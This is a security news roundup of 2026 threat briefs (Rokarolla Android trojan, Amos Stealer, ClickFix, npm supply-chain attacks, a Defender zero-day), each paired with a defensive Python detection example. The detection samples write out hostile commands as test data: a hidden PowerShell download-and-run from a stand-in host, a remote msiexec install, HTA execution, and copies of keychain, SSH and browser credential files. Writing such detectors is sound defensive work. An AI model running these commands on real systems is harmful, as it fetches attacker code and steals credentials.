Trending Topics
Rokarolla Android Trojan Emerges as Major Threat to Banking and Crypto Apps
A newly identified Android banking trojan known as Rokarolla is targeting 217 banking and cryptocurrency applications, combining financial theft with deep device control. The malware can steal lock screen PINs, intercept and send SMS messages, disable Google Play Protect, and harvest credentials via fraudulent overlay screens that sit atop legitimate apps. It also tampers with clipboard contents to silently redirect cryptocurrency transactions, swapping a victim's wallet address for the attacker's without raising suspicion.
Rokarolla's infection chain relies on social engineering and sideloading. Victims are lured to malicious websites impersonating popular apps like TikTok and Google Chrome, where they are prompted to download what appears to be an update or security tool. The initial dropper masquerades as Google Play Protect and immediately requests Android Accessibility permissions, claiming they are needed to "scan" or "secure" the device. Once granted, the malware installs its primary payload and gains extensive control - monitoring activity, capturing keystrokes, and intercepting one-time passcodes used in MFA flows.
With Accessibility permissions secured, Rokarolla shifts into credential theft and account takeover. It deploys pixel-perfect fake login screens over legitimate banking and cryptocurrency apps, tricking users into entering usernames, passwords, and MFA codes directly into attacker infrastructure. Combined with SMS interception and clipboard hijacking, this gives Rokarolla everything it needs to empty accounts, reroute crypto transfers, and maintain ongoing access.
For individuals, the best defense is to avoid sideloading entirely, install software only from the official Google Play Store, and treat any prompt to enable Accessibility for a "security" or "system cleaner" app as an immediate red flag.
For organizations, Rokarolla should be treated as a high-priority mobile security risk - especially in environments that support mobile banking, trading, or crypto custody. Security teams should reinforce mobile security awareness training, warn users explicitly against installing apps from links in SMS, email, or social media, and where possible prohibit sideloading through MDM or enterprise mobility management controls. Enterprise-managed Android devices should be monitored continuously for unauthorized Accessibility Service permissions, suspicious overlay-capable apps, and unusual clipboard or SMS behavior.
Any device suspected of infection should be isolated immediately, followed by password resets, session termination, and MFA re-enrollment from a known clean device. Reviewing network and endpoint telemetry for connections to known Rokarolla-associated domains or C2 infrastructure will help identify additional infected devices and scope the full impact of the campaign.
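The two monitoring points the brief recommends for managed Android fleets, unauthorized Accessibility grants and clipboard tampering, can both be checked from telemetry an MDM already collects. The following is an added example, not code from the original article or from any vendor: it parses the value of the Android secure setting `enabled_accessibility_services` (whose colon-separated `package/ServiceClass` format is real) against an allowlist, and flags a clipboard write that replaces one wallet address with a different address of the same kind, which is the signature a clipper leaves. The allowlist, package names, sample addresses and the `ADDRESS_PATTERNS` shape checks are constructed for the example.

```python
"""Added example (not from the original article): two device-side checks an MDM
or EDR integration could run against Android telemetry described in the brief:
(1) flag enabled Accessibility services that are not on an allowlist, and
(2) flag a clipboard write that replaces one cryptocurrency address with another.
The allowlist, package names and sample values below are constructed."""
import re
from typing import List, Optional, Tuple

# Android stores the secure setting `enabled_accessibility_services` as
# colon-separated "package/ServiceClass" entries. The entries here are sample data;
# the second one imitates a dropper posing as Play Protect.
SAMPLE_SETTING = (
    "com.android.talkback/com.google.android.marvin.talkback.TalkBackService:"
    "com.example.playprotect.update/.ScanService"
)

# Hypothetical organisation allowlist: packages permitted to hold Accessibility.
ALLOWED_ACCESSIBILITY_PACKAGES = {"com.android.talkback"}


def parse_enabled_services(setting_value: str) -> List[Tuple[str, str]]:
    """Split the setting value into (package, service_class) pairs."""
    pairs = []
    for entry in setting_value.split(":"):
        entry = entry.strip()
        if not entry or "/" not in entry:
            continue
        package, service = entry.split("/", 1)
        pairs.append((package, service))
    return pairs


def unauthorized_accessibility(setting_value: str,
                               allowlist=ALLOWED_ACCESSIBILITY_PACKAGES) -> List[str]:
    """Return packages holding the Accessibility permission that are not allowlisted."""
    return sorted({pkg for pkg, _ in parse_enabled_services(setting_value)
                   if pkg not in allowlist})


# Loose shape checks for two common wallet address formats. They classify what
# kind of string the clipboard holds; they do not validate checksums.
ADDRESS_PATTERNS = {
    "btc": re.compile(r"^(bc1[a-z0-9]{25,62}|[13][a-km-zA-HJ-NP-Z1-9]{25,34})$"),
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}


def address_kind(text: str) -> Optional[str]:
    """Return 'btc', 'eth' or None for the given clipboard text."""
    for kind, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(text.strip()):
            return kind
    return None


def clipboard_swap_suspected(copied: str, current: str) -> bool:
    """True when the clipboard held a wallet address and now holds a *different*
    address of the same kind: the user copied one destination, a clipper wrote another."""
    kind = address_kind(copied)
    return (kind is not None
            and address_kind(current) == kind
            and copied.strip() != current.strip())


if __name__ == "__main__":
    print("unauthorized accessibility:", unauthorized_accessibility(SAMPLE_SETTING))
    copied = "0x" + "a" * 40     # constructed: address the user copied
    replaced = "0x" + "b" * 40   # constructed: value now sitting in the clipboard
    print("clipboard swap suspected:", clipboard_swap_suspected(copied, replaced))
```

The accessibility check deliberately keys on the package name rather than the service class, since a dropper can name its service anything; the clipboard check only fires when both values parse as the same address type, so ordinary copy-paste of unrelated text never alerts.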
Kodak Confirms ShinyHunters Data Breach, Investigation Underway
Kodak has confirmed a data breach after the ShinyHunters extortion gang claimed it stole more than 2.2 million customer and corporate records. The company says it has only verified that a "limited amount" of data was accessed so far. The imaging giant, headquartered in upstate New York, reports that an unauthorized third party briefly accessed its data and that it has engaged external cybersecurity experts and law enforcement, while insisting there is currently no impact on its systems or operations.
ShinyHunters listed Kodak on its dark web leak site on June 15, 2026, alleging it exfiltrated over 2.2 million records containing customer personally identifiable information and internal corporate data. The group issued a June 18 deadline for Kodak to make contact or face a public leak and further "digital problems." So far, no proof samples have been posted to substantiate the full scope of the claim, and there is no independent confirmation that the volume or type of data described matches what was actually taken - leaving Kodak customers in an uneasy holding pattern while the investigation continues.
Kodak says it is still determining exactly what data was accessed and whether formal breach notifications are required under data protection laws. No service disruptions or operational outages tied to the incident have been reported.
Customers who have interacted with Kodak in recent years should monitor accounts for suspicious activity, stay alert to targeted phishing attempts referencing Kodak products or services, and watch for official notices from the company as regulators and investigators push for greater clarity on what ShinyHunters actually obtained.
Amos Stealer Targets macOS Keychain Files and Browser Passwords
Amos Stealer is an active information-stealing malware family tailored for macOS, now being used in fresh campaigns to raid Keychain files, browser passwords, cookies, and other sensitive data from Apple users. Building on the Atomic macOS Stealer lineage, this strain typically arrives via deceptive software downloads, fake installers, and social engineering lures that convince victims to run a malicious script or disk image and approve prompts that silently grant attackers access to their credentials.
Once on a system, Amos Stealer aggressively scans browser profiles for stored passwords, autofill data, and session cookies from Chromium-based browsers like Chrome and Edge, then copies the macOS Keychain database to extract corporate logins, tokens, and other high-value credentials. It also scans the user's home directory for developer and infrastructure artifacts such as SSH keys and Kubernetes configs, bundles everything into a compressed archive using native tools, and exfiltrates it to attacker-controlled infrastructure where it can be monetized or reused in follow-on intrusions against companies and cloud services.
This campaign is another clear signal that financially motivated threat actors now see macOS as a prime target - not a niche afterthought. The practical takeaway is straightforward: install macOS security updates promptly, enforce Gatekeeper and notarization, avoid pirated or unofficial app downloads, and treat any unexpected installer, password prompt, or "update" for a popular tool as suspicious until verified from a trusted source. In environments where a single stolen Keychain could unlock far more than one laptop, that verification step is not optional.
ClickFix Attack Chain Now Deploys New Potemkin Loader and RMMProject RAT
A new wave of ClickFix social engineering attacks is using fake browser security prompts and "fix" instructions to trick Windows users into running attacker-supplied commands that install a previously undocumented malware loader called Potemkin. Victims are funneled to a malicious or compromised site that displays a bogus security or update warning, then urged to copy and paste a PowerShell or installer command. That command pulls down an MSI that drops an HTML Application file used to execute the Potemkin loader on their system.
Potemkin is a custom 64-bit loader built for stealthy, long-lived remote control. It uses a domain generation algorithm driven by a 1,000-word dictionary to locate its command-and-control servers and reflectively loads follow-on payloads into memory rather than writing them to disk. Once active, it delivers RMMProject - a Lua-scriptable remote access trojan with modules to bypass Chromium's App Bound Encryption, steal browser passwords and autofill data, provide hidden remote desktop control, take screenshots, execute arbitrary Lua scripts, and pull down additional modules on demand. It frequently arrives alongside EtherRAT, a backdoor that abuses the Ethereum blockchain to resolve C2 infrastructure and uses Cloudflare tunnels for persistence.
Researchers have observed attackers using this chain to disable Microsoft Defender via AMSI bypasses and registry edits, then move laterally with tools like WMIExec and SMBExec until they reach the domain controller. A single user's "click to fix" moment becomes a full network breach.
For defenders, treat any site that instructs a user to paste a PowerShell or Run command as hostile by default. Clamp down on HTA execution and unsigned MSI installs, and tune detection to look for Potemkin and RMMProject indicators, suspicious Cloudflare tunnels, and browser processes that suddenly depart from their normal behavior or act in ways consistent with known ClickFix-style lures.
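Both the Amos Stealer brief above (Keychain copy, browser profile theft, archiving of SSH and Kubernetes material) and the ClickFix chain (pasted PowerShell download-and-run, MSI fetched from a URL, HTA execution) describe behaviour that shows up in process command lines, so one set of detection rules over process-creation telemetry serves both. The following is an added example and not code from either brief or from any EDR vendor: the pipe-delimited record format, the sample events, the `example.invalid` URL and the rule names are all constructed; the binary names, Chrome profile file names and `msiexec`/`mshta` switches are real.

```python
"""Added example, not part of the original briefs: command-line detection rules
for the Amos Stealer collection phase on macOS and the ClickFix paste chain on
Windows. The record format, sample lines and rule names are constructed; real
EDR telemetry carries the same fields under other names."""
import re
from typing import List, Tuple

# Constructed record format: platform|parent_image|image|command_line
SAMPLE_EVENTS = [
    "macos|/bin/bash|/bin/cp|cp /Users/dev/Library/Keychains/login.keychain-db /tmp/k.db",
    "macos|/bin/bash|/usr/bin/ditto|ditto -c -k /Users/dev/.ssh /tmp/s.zip",
    "macos|/bin/bash|/bin/cp|cp /Users/dev/Library/Application Support/Google/Chrome/Default/Login Data /tmp/ld",
    "macos|/bin/zsh|/usr/bin/git|git status",
    "windows|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell -w hidden -c iwr http://example.invalid/fix | iex",
    "windows|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|C:\\Windows\\System32\\msiexec.exe|msiexec /i http://example.invalid/update.msi /qn",
    "windows|C:\\Windows\\System32\\msiexec.exe|C:\\Windows\\System32\\mshta.exe|mshta C:\\Users\\Public\\setup.hta",
    "windows|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell Get-Process",
]

COPY_TOOLS = r"(?:/bin/cp|/usr/bin/ditto|/usr/bin/zip|/usr/bin/tar|/bin/cat)"
ARCHIVERS = r"(?:/usr/bin/ditto|/usr/bin/zip|/usr/bin/tar)"

# (platform, rule name, pattern applied to "|parent|image|command_line")
RULES: List[Tuple[str, str, "re.Pattern"]] = [
    # Amos Stealer: native copy/archive tools touching the login keychain.
    ("macos", "keychain_db_copied",
     re.compile(r"\|" + COPY_TOOLS + r"\|.*Library/Keychains/", re.I)),
    # Amos Stealer: developer secrets (SSH keys, kube configs) being archived.
    ("macos", "dev_secrets_archived",
     re.compile(r"\|" + ARCHIVERS + r"\|.*(?:/\.ssh|/\.kube)\b", re.I)),
    # Amos Stealer: Chromium profile credential/cookie stores being copied.
    ("macos", "browser_profile_copied",
     re.compile(r"\|" + COPY_TOOLS + r"\|.*(?:Google/Chrome|Microsoft Edge).*(?:Login Data|Cookies)", re.I)),
    # ClickFix: PowerShell launched from the shell (Run dialog) that downloads and evaluates.
    ("windows", "clickfix_powershell_download_run",
     re.compile(r"explorer\.exe\|[^|]*powershell\.exe\|.*\b(?:iwr|iex|Invoke-WebRequest|Invoke-Expression|DownloadString)\b", re.I)),
    # ClickFix: msiexec installing a package straight from a URL.
    ("windows", "msiexec_remote_package",
     re.compile(r"\|[^|]*msiexec\.exe\|.*(?:/i|/package)\s+https?://", re.I)),
    # ClickFix: HTML Application execution, from a URL or a dropped .hta file.
    ("windows", "hta_execution",
     re.compile(r"\|[^|]*mshta\.exe\|.*(?:https?://|\.hta\b)", re.I)),
]


def parse_event(line: str) -> Tuple[str, str, str, str]:
    """Split one record; maxsplit keeps pipes inside the command line intact."""
    platform, parent, image, cmdline = line.split("|", 3)
    return platform.lower(), parent, image, cmdline


def evaluate(line: str) -> List[str]:
    """Names of every rule that matches a single record, in RULES order."""
    platform, parent, image, cmdline = parse_event(line)
    haystack = f"|{parent}|{image}|{cmdline}"
    return [name for plat, name, pattern in RULES
            if plat == platform and pattern.search(haystack)]


def scan(lines) -> List[Tuple[str, int]]:
    """(rule name, record index) for every hit across a batch of records."""
    return [(name, idx) for idx, line in enumerate(lines) for name in evaluate(line)]


if __name__ == "__main__":
    for name, idx in scan(SAMPLE_EVENTS):
        print(f"{name:34s} <- {SAMPLE_EVENTS[idx]}")
```

The macOS rules anchor on the *image* doing the access rather than on the path alone, because Apple's own `security` binary legitimately reads the keychain all day; the Windows `clickfix_powershell_download_run` rule requires `explorer.exe` as the parent, which is what a pasted Run-dialog command produces and what scheduled or service-launched PowerShell does not.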
Hackers Target npm Ecosystem with Malicious Packages and Supply Chain Attacks
The npm ecosystem is under sustained attack, with threat actors publishing malicious packages and compromising maintainer accounts to turn trusted JavaScript libraries into silent delivery vehicles for malware and crypto theft. Recent campaigns linked to North Korean threat actors have seeded hundreds of bogus or backdoored packages - often disguised as logging tools, utilities, or crypto helpers - that blend into normal developer workflows and quietly execute information-stealing or wallet-draining code when installed.
One high-impact incident saw attackers phish an npm maintainer, seize control of their account, and push malicious updates to 18 widely used packages including debug, chalk, ansi-styles, and related dependencies, which collectively see over 2.6 billion weekly downloads. The injected payload ran in users' browsers to intercept and reroute cryptocurrency transactions. Even though the malicious versions were live for only a few hours, the potential blast radius spanned millions of applications and cloud environments that transitively depend on those libraries.
These campaigns fit a broader "Contagious Interview"-style playbook in which fake recruiters and developer-focused social engineering drive targets to use poisoned packages, Python payloads like InvisibleFerret, and encrypted loaders hidden in innocuous files - all aimed at siphoning corporate secrets, developer credentials, and crypto assets from compromised environments.
For teams that depend on npm, the message is straightforward: lock down maintainer accounts with strong MFA, scrutinize new or obscure packages, pin and audit dependencies, and layer in supply chain defenses that can flag unexpected post-install scripts or suspicious code changes before a single npm install becomes an entry point for a nation-state adversary.
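The advice above (pin and audit dependencies, flag unexpected install scripts, catch a poisoned release before `npm install` runs it) can be enforced with a small pre-install gate over the lockfile. The following is an added example, not npm's tooling or any project's code: the `package.json` and `package-lock.json` documents are constructed, the blocklisted version numbers are placeholders rather than real compromised releases, and `example-native-helper` is an invented package name. The lockfile layout (`lockfileVersion` 3, a `packages` map keyed by `node_modules/` path, and the `hasInstallScript` flag npm sets when a package declares an install hook) is real.

```python
"""Added example (not npm's tooling or any project's code): a lockfile gate that
(1) refuses resolved versions on a blocklist of known-bad releases,
(2) surfaces every dependency carrying an install script, and
(3) reports direct dependencies declared with floating ranges instead of pins.
The documents below are constructed; the blocklist versions are placeholders."""
import json
import re
from typing import Dict, List

# Constructed package.json: one pinned and two floating direct dependencies.
PACKAGE_JSON = json.dumps({
    "name": "example-app",
    "dependencies": {"chalk": "^5.0.0", "debug": "4.3.4", "example-native-helper": "~1.2.0"},
})

# Constructed package-lock.json in the lockfileVersion 3 layout.
PACKAGE_LOCK = json.dumps({
    "name": "example-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"dependencies": {"chalk": "^5.0.0", "debug": "4.3.4", "example-native-helper": "~1.2.0"}},
        "node_modules/chalk": {"version": "5.99.0",
                               "resolved": "https://registry.npmjs.org/chalk/-/chalk-5.99.0.tgz"},
        "node_modules/debug": {"version": "4.3.4",
                               "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz"},
        "node_modules/example-native-helper": {"version": "1.2.3", "hasInstallScript": True},
    },
})

# PLACEHOLDER blocklist (name -> versions to refuse). In practice this is fed from
# an advisory source; the version numbers here are invented for the example.
BLOCKLIST: Dict[str, set] = {"chalk": {"5.99.0"}, "debug": {"4.99.0"}}

# An exact semver (optionally with prerelease/build suffix); anything else is a range.
PINNED = re.compile(r"^\d+\.\d+\.\d+(?:[-+][0-9A-Za-z.-]+)?$")


def lock_packages(lock_text: str) -> Dict[str, dict]:
    """Map package name -> lock entry for every installed package, nested paths included."""
    lock = json.loads(lock_text)
    out: Dict[str, dict] = {}
    for path, entry in lock.get("packages", {}).items():
        if not path:
            continue  # "" is the root project itself
        # "node_modules/a/node_modules/@scope/b" -> "@scope/b"
        out[path.rsplit("node_modules/", 1)[-1]] = entry
    return out


def blocked_packages(lock_text: str, blocklist=BLOCKLIST) -> List[str]:
    """'name@version' for every lock entry whose resolved version is blocklisted."""
    return sorted(f"{name}@{entry['version']}"
                  for name, entry in lock_packages(lock_text).items()
                  if entry.get("version") in blocklist.get(name, set()))


def packages_with_install_scripts(lock_text: str) -> List[str]:
    """Packages that will run code at install time (preinstall/install/postinstall)."""
    return sorted(name for name, entry in lock_packages(lock_text).items()
                  if entry.get("hasInstallScript"))


def unpinned_direct_deps(package_json_text: str) -> List[str]:
    """Direct dependencies declared as ranges (^, ~, *, ...) rather than exact versions."""
    deps = json.loads(package_json_text).get("dependencies", {})
    return sorted(name for name, spec in deps.items() if not PINNED.match(spec))


def gate(package_json_text: str, lock_text: str) -> bool:
    """Return True when the install may proceed: no blocklisted versions present."""
    return not blocked_packages(lock_text)


if __name__ == "__main__":
    print("blocked:        ", blocked_packages(PACKAGE_LOCK))
    print("install scripts:", packages_with_install_scripts(PACKAGE_LOCK))
    print("unpinned direct:", unpinned_direct_deps(PACKAGE_JSON))
    print("install allowed:", gate(PACKAGE_JSON, PACKAGE_LOCK))
```

Only the blocklist check is a hard stop in `gate`; install scripts and floating ranges are reported for review, since many legitimate native modules need a build step. Pairing this with `npm ci` (which installs exactly what the lockfile says) and, where the build allows it, `npm ci --ignore-scripts`, removes the two paths the poisoned-package campaigns above relied on: a fresh resolve pulling a just-published bad version, and a post-install hook executing on the developer's machine.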
Update: Microsoft Races to Patch RoguePlanet 0-Day in Defender (CVE-2026-50656)
Microsoft is racing to ship a fix for RoguePlanet, a zero-day in Microsoft Defender that lets attackers escalate to SYSTEM on fully patched Windows 10 and 11, tracked as CVE-2026-50656. Until that patch lands, defenders need to treat Defender itself as a potential path for privilege escalation and tighten their exposure accordingly.
RoguePlanet is the latest in a string of Defender zero-days dropped publicly by the researcher known as Nightmare Eclipse, who has been protesting Microsoft's handling of security disclosures and bug bounties. The bug abuses a race condition in the Microsoft Malware Protection Engine, allowing a local attacker with low privileges to trigger a Defender scan workflow that ultimately spawns a command prompt running with SYSTEM rights - even after the June 2026 Patch Tuesday updates. ThreatLocker and other researchers have independently reproduced the exploit on fully updated machines, confirming this is not theoretical and that current patches do not close the hole.
Microsoft has acknowledged CVE-2026-50656 and confirmed a security update is in development. The company is also investigating whether the flaw can be triggered when real-time protection is disabled or when Defender runs in passive mode alongside third-party security tools - a question that matters for enterprises that treat Defender as a secondary control rather than a primary one. Given Microsoft's recent pattern with RedSun and UnDefend, and the pressure of repeated public exploit drops, defenders should expect either an out-of-band release or accelerated inclusion in the next Patch Tuesday cycle and plan testing windows now.
In practice, RoguePlanet is a local privilege escalation bug - but it pairs naturally with initial access vectors like phishing, browser exploits, or macro abuse to hand an attacker instant SYSTEM control after the first foothold. Organizations that rely heavily on Defender should immediately review where standard users can execute untrusted code, push stricter application control policies, and validate that endpoint detection and response tooling can identify unusual Defender-spawned processes or unexpected SYSTEM-level shells.
For individual users on fully patched Windows 10 and 11 machines, this is a moment to confirm that updates are enabled, avoid running unknown software, and consider adding hardened browser and email security measures while Microsoft works on a fix.
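The brief describes RoguePlanet's end state as a Defender scan workflow that ends in a SYSTEM command prompt, and asks that EDR tooling be able to spot "unusual Defender-spawned processes or unexpected SYSTEM-level shells." That is a process-lineage question, and the following is an added example of answering it, not code from the article, from Microsoft or from ThreatLocker: it walks a process tree built from Sysmon-style process-creation events and flags any shell running as SYSTEM whose ancestry reaches a Defender engine binary within a few hops. `MsMpEng.exe` and `MpCmdRun.exe` are Defender's real engine and command-line binaries; the event records, PIDs and the `Platform\4.18.0` path segment are constructed sample data.

```python
"""Added example, not from the article or from Microsoft: a process-lineage
check for the behaviour attributed to RoguePlanet, a shell running as SYSTEM
whose ancestry leads back to the Defender engine. Events are constructed in a
Sysmon-like shape (pid, ppid, image, user)."""
import ntpath
from typing import Dict, List, Optional

DEFENDER_IMAGES = {"msmpeng.exe", "mpcmdrun.exe"}      # real Defender binaries
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe"}
SYSTEM_USER = "nt authority\\system"
MAX_HOPS = 4  # how far up the tree to look for a Defender ancestor

# Constructed process-creation events. The chain 3100 -> 5200 -> 5300 is the
# suspicious one; 7000 is a SYSTEM cmd.exe with an ordinary service lineage.
SAMPLE_EVENTS = [
    {"pid": 4,    "ppid": 0,    "image": "System", "user": "NT AUTHORITY\\SYSTEM"},
    {"pid": 800,  "ppid": 4,    "image": "C:\\Windows\\System32\\services.exe", "user": "NT AUTHORITY\\SYSTEM"},
    {"pid": 3100, "ppid": 800,  "image": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.0\\MsMpEng.exe",
     "user": "NT AUTHORITY\\SYSTEM"},
    {"pid": 5200, "ppid": 3100, "image": "C:\\Windows\\System32\\conhost.exe", "user": "NT AUTHORITY\\SYSTEM"},
    {"pid": 5300, "ppid": 5200, "image": "C:\\Windows\\System32\\cmd.exe", "user": "NT AUTHORITY\\SYSTEM"},
    {"pid": 1200, "ppid": 900,  "image": "C:\\Windows\\explorer.exe", "user": "CORP\\alice"},
    {"pid": 6000, "ppid": 1200, "image": "C:\\Windows\\System32\\cmd.exe", "user": "CORP\\alice"},
    {"pid": 7000, "ppid": 800,  "image": "C:\\Windows\\System32\\cmd.exe", "user": "NT AUTHORITY\\SYSTEM"},
]


def basename(image: str) -> str:
    """Lower-cased file name of a Windows image path (ntpath works on any host OS)."""
    return ntpath.basename(image).lower()


def defender_ancestor(event: dict, by_pid: Dict[int, dict],
                      max_hops: int = MAX_HOPS) -> Optional[str]:
    """Image path of the nearest Defender ancestor within max_hops, else None."""
    current = event
    for _ in range(max_hops):
        parent = by_pid.get(current["ppid"])
        if parent is None:          # root of the tree, or parent not in telemetry
            return None
        if basename(parent["image"]) in DEFENDER_IMAGES:
            return parent["image"]
        current = parent
    return None


def system_shells_from_defender(events: List[dict]) -> List[dict]:
    """Shells running as SYSTEM that descend from a Defender process."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if basename(e["image"]) not in SHELL_IMAGES:
            continue
        if e["user"].lower() != SYSTEM_USER:
            continue
        ancestor = defender_ancestor(e, by_pid)
        if ancestor:
            hits.append({"pid": e["pid"], "image": e["image"], "via": ancestor})
    return hits


if __name__ == "__main__":
    for hit in system_shells_from_defender(SAMPLE_EVENTS):
        print(f"SYSTEM shell pid {hit['pid']} descends from {hit['via']}")
```

Walking several hops rather than checking only the direct parent matters here because the brief says the shell is spawned at the end of a scan workflow, not necessarily by the engine itself; the hop limit keeps the rule from firing on every SYSTEM process on a box where Defender happens to sit near the root of the tree. A SYSTEM shell with an ordinary service-control lineage (pid 7000 above) is left for other rules.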
Written By: William Elchert